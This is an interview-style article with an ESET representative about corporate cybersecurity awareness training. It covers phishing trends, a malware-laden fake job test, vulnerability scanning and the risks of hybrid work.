Did you know that the vast majority of cyber attacks are caused by human error and lack of employee knowledge? And the incidents are steadily increasing. In the first half of 2023 alone, the number of fraudulent phishing emails in the country tripled.
While until recently threats were relatively easy to detect, even with poor grammar or unintelligible context, the advent of artificial intelligence has led to an increase in higher quality fraudulent messages, which even experienced IT professionals are having increasing problems with.
ESET products have detected and blocked three frequently occurring threats in just 6 months:
- A fake HTML/Phishing.Agent login window that was distributed as an HTML attachment via email and, when opened in a browser, mimicked Microsoft Office services such as Outlook or SharePoint.
- A DOC/Fraud sextortion email in which the attacker pretended ownership of the victim’s sensitive sex tape and demanded a sum of €1,500 in bitcoins not to release the video, with the attack seeing a 277% increase, according to ESET.
- And phishing, abusing the brand Slovenská pošta, where an e-mail message informed about the fictitious delivery of a package after payment of a fictitious customs fee. The scam appeared 275% more frequently this year, moving up seven places in the phishing threat rankings.
We spoke to ESET’s Július Selecky, ESET Senior Technical Pre-Sales Representative, about the cyber pitfalls and the resulting importance of education and awareness in the area of corporate cybersecurity.
Július Selecký, Senior Technical Pre-Sales Representative, ESET
Cybersecurity in companies today is in the hands of not only IT administrators, but also employees and company management. Why are education and awareness in this area so important?
Corporate security rests on three main pillars: people, technology and processes. Everyone from support staff to senior management should be informed about important security issues in the company, and the resilience of the entire company will be greatly enhanced. People in the company need to be given the same attention as security software or hardware and policies. Their training is often neglected, yet it is people who are the most frequent attack vectors.
ESET regularly trains its employees internally, for example in detecting phishing emails. If we look at the statistics, phishing, an email that tries to extort access data or bank details, is at the top of the list of cyber threats. Employees are therefore regularly tested by sending messages that look legitimate but are not, and it is the employee’s job to detect such fake messages. In turn, we offer clients ESET cyber security training, e-learning courses that serve to raise general awareness.
Do Slovak companies place enough emphasis on cyber security? How often do they need to be retrained?
Life around us is closely tied to information and communication technologies, and cyber incidents weaken companies, the state, or the entire economy, and people’s trust in these institutions. It is impossible to move forward without strengthening cybersecurity, which is why more and more emphasis is being placed on it. However, one-off training is of little use; education needs to be regular, because people need to keep security in sight so that they can automate it.
A suitable training format is once a year basic, general training for everyone who uses a PC in the company. Plus additional training throughout the year, e.g. on specific IT security topics or focused on employee roles (IT administrators, developers, accounting departments, management, etc.).
And in particular, what should companies focus on when educating employees about IT security?
The software development company will focus on secure development, the hotel chain on billing fraud prevention, the industrial facility on secure OT operation, etc. A company’s human risk management should consist of a collection of activities based on the individual organization’s data and expert risk analysis, not out-of-context and chaotic reactions to current buzzworms.
However, training is only one part of education! The other, even more important, is practical experience. It is a proven fact that theory without practice is useless. For example, even employees who have heard about fraudulent emails and know that they contain a suspicious link will write their details in it the first time they are tested. Or employees who have heard of a password manager and know it’s a good idea to use it, but only a third of them actually do.
So how do you explain the necessity of enterprise IT security to company executives?
In the same way that locking doors, setting alarms and cameras are used to protect a physical space, cybersecurity is the same thing, only in the digital world. If I haven’t invested in these virtual locks yet, I’m going to look like I’m stuck somewhere in the last century. But in many cases, it takes an unpleasant personal experience, with not only ordinary employees but also senior management falling victim to attacks.
Recently, attackers selected a specific company via LinkedIn and offered an employee an attractive job position, and if he wanted to apply for it, he had to fill in a test that was sent to him in a certain file. But when he opened the file at work, it contained dangerous malware, and as soon as it was launched, it got into the company network, scanned it, found out how many vulnerable computers there were, and spread further. In this way, the attackers gained access to company data. If the employee in question had been trained, he would have known not to run this type of file on a work computer, but in an isolated area, and a similar incident would not have occurred.
So, can we name the biggest current cyber threats that companies should definitely watch out for?
Experience shows that the most common risks, which should also be taken into account by education, are social engineering and phishing, unintentional data leaks or weak authentication mechanisms. Each type of organisation has different risks arising from human behaviour.
ESET has published the top 10 cyber threats on its information and education portal Bezpecnevofirme.eset.com, with top rankings for pitfalls such as inconsistent management of corporate systems, phishing and other fraudulent messages, ransomware attacks and risks caused by the rise of hybrid working. For ordinary people and households, ESET has set up the Bezpecnenanete.eset.com portal.
Companies often use several different servers, such as a mail server, web server, DNS, VPN, etc. How to protect such devices or detect their weaknesses in time?
Here it is important to implement a system for automated vulnerability scanning, called Vulnerability Assessment, which ESET also offers as a service for finding and managing vulnerabilities. In this way, weaknesses in systems (servers) that attackers exploit in an attempt to harm the company can be detected early. The customer receives a report with a description of the identified weaknesses with an assessment of their severity. Subsequently, after consultation with ESET experts, we will recommend steps to eliminate the identified weaknesses. In this regard, companies can also turn to a dedicated ESET partner such as GAMO.
In order to bring this additional layer of protection to as many customers as possible, we at ESET have decided to implement Vulnerability and Patch Management into our protection solutions as well. It can proactively monitor vulnerabilities in operating systems and common applications, and also enables automated deployment of patches on endpoint devices that are managed through our unified PROTECT platform.
Hybrid work is a new phenomenon after the pandemic. Let us conclude by saying a little more about the main risks it poses.
This is a real challenge for IT security specialists. Hybrid work, i.e. working in the office one day and at home the next, brings with it a number of risks such as problematic protection of the corporate network, poorly secured network at home, or poor security of access to corporate systems from the home-office. There is also a higher risk of lost or stolen devices, using private devices for work, or a higher likelihood of an employee falling for phishing. For example, full-disk encryption on corporate devices, reliable security software on endpoint devices with anti-theft capabilities, and again, employee education could help.
Of course, there is not some 100% solution that, when implemented, you can say that you are protected. Most of the time, it is always a set of comprehensive measures that can significantly reduce cyber risks.
